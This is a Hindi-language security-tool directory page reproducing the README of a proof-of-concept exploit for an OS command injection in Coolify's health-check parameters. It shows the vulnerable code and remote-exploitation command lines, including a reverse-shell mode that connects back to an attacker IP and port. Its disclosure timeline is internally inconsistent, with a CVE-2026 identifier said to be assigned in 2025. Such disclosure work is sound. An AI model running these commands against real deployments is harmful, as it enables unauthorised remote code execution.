Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/cybertechajju/cve-2026-59734-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubcybertechajju/cve-2026-59734-poc

CVE-2026-59734-POC

स्वास्थ्य जांच में OS कमांड इंजेक्शन → दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
हैकर ग्लिच

🚨 CVE-2026-59734 — कूलिफ़ाई RCE शोषण

स्वास्थ्य जांच में OS कमांड इंजेक्शन → रिमोट कोड निष्पादन

CVE CVSS Advisory Patched Author


Medium लेख

YouTube



कूलिफ़ाई के स्वास्थ्य जांच कॉन्फ़िगरेशन में OS कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण।
कोई भी प्रमाणित उपयोगकर्ता तैनात कंटेनरों के अंदर मनमाने कमांड निष्पादित कर सकता है।


🎯 भेद्यता के बारे में

Coolify एक लोकप्रिय ओपन-सोर्स, स्व-होस्टेड डिप्लॉयमेंट प्लेटफॉर्म है (30K+ GitHub स्टार) — जो Heroku, Vercel और Netlify का मुफ्त विकल्प है।

कूलिफ़ाई के स्वास्थ्य जांच कॉन्फ़िगरेशन में एक गंभीर OS कमांड इंजेक्शन भेद्यता पाई गई। health_check_host, health_check_method, और health_check_path पैरामीटर बिना किसी सैनिटाइज़ेशन के सीधे शेल कमांड में डाले जाते हैं, जिससे कोई भी प्रमाणित उपयोगकर्ता डिप्लॉयमेंट कंटेनरों के अंदर मनमाने कमांड निष्पादित कर सकता है।

root@kitploit:~
┌──────────────────┬──────────────────────────────────────┐
│ CVE ID           │ CVE-2026-59734                       │
│ Type             │ OS Command Injection (CWE-78)        │
│ Severity         │ HIGH — CVSS 8.8                      │
│ Attack Vector    │ Network (Authenticated)              │
│ Affected         │ Coolify <= v4.0.0-beta.460           │
│ Fixed In         │ Coolify >= v4.0.0-beta.469           │
│ Fix Commit       │ 23f9156c7                            │
│ Reporter         │ CyberTechAjju                        │
└──────────────────┴──────────────────────────────────────┘
🔥 भेद्य कोड (विस्तार करने के लिए क्लिक करें)
root@kitploit:~
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()

// ⚠️ User input directly in shell command — NO escapeshellarg()!
$generated_healthchecks_commands = [
    "curl -s -X {$this->application->health_check_method} -f " .
    "{$this->application->health_check_scheme}://" .
    "{$this->application->health_check_host}:" .
    "{$health_check_port}" .
    "{$this->application->health_check_path} > /dev/null || exit 1",
];

🛠️ यह उपकरण क्या करता है

यह PoC स्क्रिप्ट CVE-2026-59734 को दो मोड में मान्य करती है और इसका शोषण करती है:

Modeविवरणजोखिम
--localभेद्य कोड पैटर्न को ऑफ़लाइन अनुकरण करता है। कोई नेटवर्क अनुरोध नहीं। सभी 3 इंजेक्ट करने योग्य पैरामीटर का परीक्षण + फिक्स की पुष्टि करता है।✅ सुरक्षित
--remoteAPI के माध्यम से एक वास्तविक कूलिफ़ाई इंस्टेंस का शोषण करता है। स्वास्थ्य जांच कॉन्फ़िगरेशन में पेलोड इंजेक्ट करता है और डिप्लॉयमेंट ट्रिगर करता है।⚠️ प्रमाणीकरण आवश्यक

विशेषताएं

  • 🧪 4 स्थानीय परीक्षण — host, method, path के माध्यम से इंजेक्शन को मान्य करता है + पुष्टि करता है कि escapeshellarg() फिक्स काम करता है
  • 🔑 प्रमाणीकरण सत्यापन — शोषण का प्रयास करने से पहले API टोकन और अनुमतियों की जाँच करता है
  • 📋 संस्करण पहचान — कूलिफ़ाई संस्करण का पता लगाता है और यदि पहले से पैच किया गया है तो चेतावनी देता है
  • 🎯 प्रूफ टोकन — गलत सकारात्मक परिणामों को रोकने के लिए अद्वितीय टोकन का उपयोग करता है
  • 🐚 रिवर्स शेल मोड — --lhost / --lport के साथ अंतर्निहित रिवर्स शेल पेलोड
  • 🧹 सफाई मोड — शोषण के बाद मूल स्वास्थ्य जांच कॉन्फ़िगरेशन को पुनर्स्थापित करता है
  • 🛡️ इंजेक्शन सत्यापन — पुष्टि करता है कि सर्वर ने पेलोड को बिना सैनिटाइज़ किए संग्रहीत किया

⚡ त्वरित आरंभ

स्थानीय मान्यता (सुरक्षित और ऑफ़लाइन)

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh

# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local

अपेक्षित आउटपुट:

root@kitploit:~
═══ LOCAL VULNERABILITY PATTERN VALIDATION ═══

┌─ Test 1: health_check_host injection
│  ✅ VULNERABLE — Injected command executed successfully

┌─ Test 2: health_check_method injection
│  ✅ VULNERABLE — Method parameter also injectable

┌─ Test 3: health_check_path injection
│  ✅ VULNERABLE — Path parameter also injectable

┌─ Test 4: Verify that escapeshellarg() fixes the issue
│  ✅ SAFE — Sanitized input prevents injection

रिमोट शोषण (केवल अधिकृत परीक्षण)

root@kitploit:~
# Basic PoC — writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID

# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --lhost YOUR_IP \
  --lport 4444

# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --cleanup

📋 सभी विकल्प

root@kitploit:~
उपयोग:

  स्थानीय मान्यता (सुरक्षित, ऑफ़लाइन):
    ./coolify_healthcheck_rce_poc.sh --local

  रिमोट शोषण (प्रमाणीकरण आवश्यक):
    ./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <TOKEN> --uuid <UUID> [OPTIONS]

विकल्प:
  --url       कूलिफ़ाई इंस्टेंस URL (उदा. https://coolify.example.com)
  --token     API बियरर टोकन
  --uuid      लक्ष्य एप्लिकेशन UUID
  --payload   कस्टम इंजेक्शन पेलोड
  --lhost     रिवर्स शेल के लिए हमलावर IP
  --lport     रिवर्स शेल के लिए हमलावर पोर्ट (डिफ़ॉल्ट: 4444)
  --cleanup   शोषण के बाद मूल कॉन्फ़िगरेशन पुनर्स्थापित करें

🔍 API टोकन और ऐप UUID कैसे प्राप्त करें

API टोकन:

  1. कूलिफ़ाई डैशबोर्ड में लॉगिन करें
  2. सेटिंग्स → API टोकन पर जाएं
  3. एक नया टोकन जनरेट करें

ऐप UUID:

root@kitploit:~
curl -s https://YOUR-COOLIFY/api/v1/applications \
  -H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'

📖 पूरा लेख

मैंने एक विस्तृत ब्लॉग पोस्ट लिखा है जो पूरी खोज, शोषण और सीखे गए सबक बताता है:

🔗 How I Found an OS Command Injection (RCE) in Coolify — Medium


🎥 वीडियो वॉकथ्रू

YouTube पर पूरा शोषण डेमो देखें:

🔗 CVE-2026-59734 — Coolify RCE Demo — YouTube


✅ समयरेखा

दिनांकघटना
Jan 6, 2025🔍 खोजा गया और GitHub सुरक्षा सलाहकार के माध्यम से रिपोर्ट किया गया
Jan 16, 2025✅ कूलिफ़ाई अनुरक्षक द्वारा रिपोर्ट स्वीकार की गई
Feb 24, 2025🔬 जांच की पुष्टि हुई
Mar 18, 2025🔧 फिक्स प्रतिबद्ध (23f9156c7)
Apr 12, 2025📦 v4.0.0-beta.469 में फिक्स जारी किया गया
Jul 2025🏷️ CVE-2026-59734 निर्धारित और सलाहकार प्रकाशित

⚠️ कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

यह PoC सुरक्षा शोधकर्ताओं और बग बाउंटी शिकारियों के लिए है, जिनके पास ऑडिट करने के लिए स्पष्ट, दस्तावेजी अनुमति है। उन प्रणालियों के खिलाफ अनधिकृत उपयोग जो आपके नहीं हैं, सख्त वर्जित है और स्थानीय, राज्य और संघीय कानूनों का उल्लंघन कर सकता है।

लेखक (CyberTechAjju) कोई देयता नहीं लेता है और इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


🏆 CyberTechAjju द्वारा और CVEs

CVEलक्ष्यप्रकारगंभीरता
CVE-2026-45156Nextcloud user_oidcJWT हस्ताक्षर बाईपास🔴 गंभीर (9.8)
CVE-2026-59734CoolifyOS कमांड इंजेक्शन🟠 उच्च (8.8)

Medium YouTube GitHub



"They forgot to sanitize. I didn't forget to report."
🇮🇳 Hack the planet. 🌎💻

टूल डाउनलोड करें